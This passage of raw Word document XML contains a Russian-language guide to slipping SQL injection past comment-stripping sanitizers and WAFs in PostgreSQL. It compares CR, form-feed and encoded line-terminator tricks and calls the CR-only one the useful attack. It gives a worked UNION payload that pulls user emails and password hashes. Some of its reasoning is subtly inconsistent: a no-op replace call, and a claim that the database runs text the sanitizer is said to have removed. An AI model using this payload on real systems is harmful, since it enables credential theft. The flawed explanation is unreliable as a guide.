          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>. Это распространённый паттерн.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5309C7CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer на bytes-уровне</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ModSecurity raw byte match): часто работает только с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, игнорируя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39429D19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/HTML-уровень</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: framework-decode разворачивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Browser обычно посылает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в text/form fields. JS fetch API может отправить любой byte sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91A691" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три класса атак:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFE464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CR-only bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: sanitizer strip-ает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но не отдельный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--comment\rINJECTED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sanitizer не видит line-terminator после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, считает весь остаток комментарием. PG обрывает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>, исполняет INJECTED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD99064" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FF/VT bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: form feed (0x0C) и vertical tab (0x0B) — PG-парсер их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> считает line-terminator для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментария (только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но sanitizer может ошибочно их учитывать как «новая строка». Этот case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на PG (обратное от 3.12.1), но полезен для понимания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688531C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encoded CRLF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D%0A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%E2%80%A8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Unicode line-separator U+2028), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%E2%80%A9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (paragraph separator U+2029) — sanitizer на JSON/HTML-уровне может normalize Unicode line-terminators, но PG их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> считает terminator. Аналогично case 2, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для атаки, но создаёт false-positive в sanitizer-логах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D39D3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Полезный case для атаки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только #1 (CR-only)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и его варианты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494460B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — CR-only line-terminator после `--`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E21DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: sanitizer Python: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value = value.replace('\r\n', '\n').replace('\n', '\n')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — strip-ает CRLF и LF, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> strip-ает одиночный CR. Custom sanitizer без знания PG-специфики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA62AFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Затем sanitizer ловит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как комментарий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value = re.sub(r'--[^\n]*', '', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — удаляет всё от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (но не до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC6150" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, передаётся как raw bytes через JSON-API, не form): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%75%6E%69%6F%6E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> равно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE0A76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'--harmless\rUNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA426E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — литеральный байт 0x0D (передаётся как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в URL-encoded или как raw byte в JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A749A06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>"`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56459DA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD5EAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, body FROM articles WHERE title = 'admin'--harmless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E5818A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7668B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(где первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG отображается как обрыв строки в визуальной форме).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15D36A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitizer Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C5928" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>replace('\r\n', '\n')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> соответствует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не trim-ит. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> остался.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD53097" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.sub(r'--[^\n]*', '', q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ищет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> затем любые non-newline-char до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — non-newline по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[^\n]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[^\n]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">!). Регекс идёт от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--harmless\rUNION SELECT...FROM users--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до конца — целиком как комментарий. Удаляет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6019F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   После sanitize: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пустая активная часть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6918D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WAF тоже не видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (после удаления комментария).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EAAF1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но PG-парсер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как line-terminator для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>-комментария:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D08E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'--harmless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комментарий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AB106" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конец комментария, начало нового SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654614BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
